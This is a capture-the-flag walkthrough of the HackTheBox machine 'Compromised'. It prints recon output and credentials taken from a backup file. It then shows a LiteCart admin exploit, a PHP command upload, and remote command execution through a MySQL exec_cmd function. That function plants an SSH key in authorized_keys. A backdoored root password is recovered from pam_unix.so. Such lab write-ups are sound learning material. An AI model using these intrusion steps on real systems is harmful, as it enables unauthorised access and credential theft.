COMPROMISED HACKTHEBOX WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 21:00 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
Initiating Ping Scan at 21:00
Scanning 10.10.10.207 [4 ports]
Completed Ping Scan at 21:00, 0.34s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:00
Scanning compromised.htb (10.10.10.207) [1000 ports]
Discovered open port 80/tcp on 10.10.10.207
Discovered open port 22/tcp on 10.10.10.207
Completed SYN Stealth Scan at 21:01, 15.68s elapsed (1000 total ports)
Initiating Service scan at 21:01
Scanning 2 services on compromised.htb (10.10.10.207)
Completed Service scan at 21:01, 6.57s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against compromised.htb (10.10.10.207)
Retrying OS detection (try #2) against compromised.htb (10.10.10.207)
Initiating Traceroute at 21:01
Completed Traceroute at 21:01, 0.29s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 21:01
Completed Parallel DNS resolution of 2 hosts. at 21:01, 0.16s elapsed
NSE: Script scanning 10.10.10.207.
Initiating NSE at 21:01
Completed NSE at 21:01, 8.43s elapsed
Initiating NSE at 21:01
Completed NSE at 21:01, 1.13s elapsed
Initiating NSE at 21:01
Completed NSE at 21:01, 0.00s elapsed
Nmap scan report for compromised.htb (10.10.10.207)
Host is up (0.28s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:da:5c:8e:8e:fb:8e:75:27:4a:b9:2a:59:cd:4b:cb (RSA)
|   256 d5:c5:b3:0d:c8:b6:69:e4:fb:13:a3:81:4a:15:16:d2 (ECDSA)
|_  256 35:6a:ee:af:dc:f8:5e:67:0d:bb:f3:ab:18:64:47:90 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: FD8AFB6FFE392F9ED98CC0B1B37B9A5D
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Legitimate Rubber Ducks | Online Store
|_Requested resource was http://compromised.htb/shop/en/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 - 3.1 (86%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 35.219 days (since Mon Aug 10 15:46:07 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   278.78 ms 10.10.14.1
2   278.87 ms compromised.htb (10.10.10.207)

NSE: Script Post-scanning.
Initiating NSE at 21:01
Completed NSE at 21:01, 0.00s elapsed
Initiating NSE at 21:01
Completed NSE at 21:01, 0.00s elapsed
Initiating NSE at 21:01
Completed NSE at 21:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.99 seconds
           Raw packets sent: 2088 (95.460KB) | Rcvd: 42 (2.536KB)

PORT 80

Lets use gobuster

┌─[root@liquid]─[~]
└──╼ #gobuster dir -u http://10.10.10.207 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.207
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/14 21:02:13 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/backup (Status: 301)
/index.php (Status: 302)
/server-status (Status: 403)
/shop (Status: 301)
===============================================================
2020/09/14 21:04:24 Finished
===============================================================

Got some directory named BACKUP

So lets get that out!!!

It is a backup folder of website

where we could find data which could help in foothold

Here we have some directory named /.log2301c9430d8593ae.txt

So lets go to this directory

User: admin Passwd: theNextGenSt0r3!~

Here we got creds

Lets enumerate through more files

Here we will see salt hash in includes directory and admin creds which we already got

password salt hash database password

Here we got admin now we need exploit for litecart

https://www.exploit-db.com/exploits/45267

┌─[✗]─[root@liquid]─[~/Desktop/HTB/compromise]
└──╼ #python 45267.py -t http://10.10.10.207/shop/admin -u admin -p 'theNextGenSt0r3!~'

Here exploit will work but could not get shell

So we will be using this but we cannot get shell if you see so lets just do it manually as given in exploit

Here we see that phpinfo is working but not commands and all so we need other script for this to work but also we have to change application/x-php to application/xml in burp so that we could upload it as we can see in exploit we found from exploit-db so it could upload shell but cannot run shell commands

Lets figure this out we have a script for this php exploit which could work

https://github.com/Manangoel98/compromisemachine

here we have exploit.php which will work here you will just need to change value in pwn(“id”)

SO just upload this same as we did for phpinfo then you just need to navigate to file and run this

http://10.10.10.207/shop/vqmod/xml/exploit.php

Here you will see this

Now we cannot get shell as we dont have bash execution so we need to get everything from here only

as we can see /etc/passwd also that mysql has bash and we also got creds for its database

So for now we have only mysql creds to be used lets use that database and get more data

Here i had to take help from my discord friend

https://mariadb.com/kb/en/mysqlfunc-table/

mysql -u root -pchangethis -e “SELECT * FROM mysql.func;

so lest run some commands

main format for mysql command part is that we can exec command as we know so its format would be like this

mysql -u root -pchangethis -e “SELECT trim(trailing char(0x00) from exec_cmd(\”id\”));”

You will see its output as we can execute commands here

So lets insert ssh keys in mysql home directory and use them to get access of mysql user

GETTING USER ACCESS

Generate SSH keys

┌─[root@liquid]─[~/Desktop/HTB/compromise]
└──╼ #ssh-keygen -t ed25519
Generating public/private ed25519 key pair.
Enter file in which to save the key (/root/.ssh/id_ed25519): /root/Desktop/HTB/compromise/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/Desktop/HTB/compromise/id_rsa
Your public key has been saved in /root/Desktop/HTB/compromise/id_rsa.pub
The key fingerprint is:
SHA256:dhR8pLv+av+8874tQwjdyZNvjGGlFQuFrT/2Rv5v7g4 root@liquid
The key's randomart image is:
+--[ED25519 256]--+
|         .....+o.|
|          .o....+|
|          oo o.B |
|         .....X  |
|        S o. o.* |
|       . . .. o+=|
|          .  .E+o|
|         ..  .+.*|
|         .o+o.+#&|
+----[SHA256]-----+
┌─[root@liquid]─[~/Desktop/HTB/compromise]
└──╼ #chmod 600 id_rsa
┌─[root@liquid]─[~/Desktop/HTB/compromise]
└──╼ #

Copy public key in mysql home directory

mysql -u root -pchangethis -e “SELECT trim(trailing char(0x00) from exec_cmd(\”mkdir -p ~/.ssh; echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKoXKoSkzttsg2CfmG7V51HozuTqgw3sO09YPWlTeuEU root@liquid > ~/.ssh/authorized_keys\”));”

Then trigger it through exploit page

Now just ssh into the machine

┌─[✗]─[root@liquid]─[~/Desktop/HTB/compromise]
└──╼ #ssh -i id_rsa mysql@10.10.10.207
Last login: Mon Sep 14 16:58:01 2020 from 10.10.14.201
mysql@compromised:~$ id
uid=111(mysql) gid=113(mysql) groups=113(mysql)
mysql@compromised:~$ hostname
compromised
mysql@compromised:~$

Now here we got mysql access but still cannot get user file so as its name is compromise so lets check what files are changed when this machine was compromised

mysql@compromised:~$ dpkg -V 2>/dev/null
??5??????   /boot/System.map-4.15.0-99-generic
??5?????? c /etc/apache2/apache2.conf
??5?????? c /etc/apache2/sites-available/000-default.conf
??5??????   /boot/vmlinuz-4.15.0-101-generic
??5?????? c /etc/sudoers
??5?????? c /etc/sudoers.d/README
??5?????? c /etc/at.deny
??5?????? c /etc/iscsi/iscsid.conf
??5??????   /boot/vmlinuz-4.15.0-99-generic
??5??????   /bin/nc.openbsd
??5??????   /boot/System.map-4.15.0-101-generic
??5??????   /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla
??5??????   /lib/x86_64-linux-gnu/security/pam_unix.so
??5?????? c /etc/apparmor.d/usr.sbin.mysqld
??5?????? c /etc/mysql/mysql.conf.d/mysqld.cnf
mysql@compromised:~$ 


Here we see that number of files were changed but interesting ones are

/lib/x86_64-linux-gnu/security/pam_unix.so

So lets just check this binary here only by using this command

objdump -D /lib/x86_64-linux-gnu/security/pam_unix.so | less

You will see some hex digits

Here in authenticated function we these HEX digit Lets decode them and see what it actually is. it can be done in ghidra also

if we use it as password for root we get authentication error just reverse this in python then again try it for root

>>> "-2m28vnE3U~eklz"[::-1]
'zlke~U3Env82m2-'
>>> 

GOT ROOT ACCESS

root : zlke~U3Env82m2-

mysql@compromised:~$ su root
Password: 
root@compromised:/var/lib/mysql# cd
root@compromised:~# id
uid=0(root) gid=0(root) groups=0(root)
root@compromised:~# cat /root/root.txt
a33163ae366fab6d3ae951e41781c772
root@compromised:~# cat /home/sysadmin/user.txt 
94b44b229b50ea261ff73c225dcb6d59
root@compromised:~# 

Here we got root access But Still here we have one more way will be adding it up asap !!

2nd Part for user sysadmin access

we have mysql access and we can get sys admin pass through grep command just like this

mysql@compromised:~$ grep -nlri sysadmin
strace-log.dat

Now we know the file which contains sysadmin in it lets grep for password in this

mysql@compromised:~$ cat strace-log.dat | grep password
22102 03:11:06 write(2, "mysql -u root --password='3*NLJE"..., 39) = 39
22227 03:11:09 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=3*NLJE32I$Fe"], 0x55bc62467900 /* 21 vars */) = 0
22227 03:11:09 write(2, "[Warning] Using a password on th"..., 73) = 73
22102 03:11:10 write(2, "mysql -u root --password='3*NLJE"..., 39) = 39
22228 03:11:15 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=changeme"], 0x55bc62467900 /* 21 vars */) = 0
22228 03:11:15 write(2, "[Warning] Using a password on th"..., 73) = 73
22102 03:11:16 write(2, "mysql -u root --password='change"..., 35) = 35
22229 03:11:18 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=changethis"], 0x55bc62467900 /* 21 vars */) = 0
22229 03:11:18 write(2, "[Warning] Using a password on th"..., 73) = 73
22232 03:11:52 openat(AT_FDCWD, "/etc/pam.d/common-password", O_RDONLY) = 5
22232 03:11:52 read(5, "#\n# /etc/pam.d/common-password -"..., 4096) = 1440
22232 03:11:52 write(4, "[sudo] password for sysadmin: ", 30) = 30

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

One thought on “COMPROMISED HACKTHEBOX WRITEUP

Add yours

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: